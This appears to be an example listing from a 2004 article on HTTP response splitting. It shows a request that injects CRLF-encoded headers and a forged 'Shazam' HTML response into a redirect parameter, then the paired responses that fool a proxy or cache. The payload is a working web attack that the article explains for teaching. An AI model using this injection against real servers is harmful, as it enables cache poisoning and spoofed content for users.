August, 2004: HTTP Response Splitting

(a)

/redir_lang.jsp?lang=foobar%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html>Shazam</html>

(b)

/index.html

(c)

The following response is then matched to the second request for /index.html [Example 3(b)].
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0
And that the second request (to /index.html) is matched to the second response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Shazam</html>

Example 3: Fooling the targets by feeding them multiple requests.

Back to Article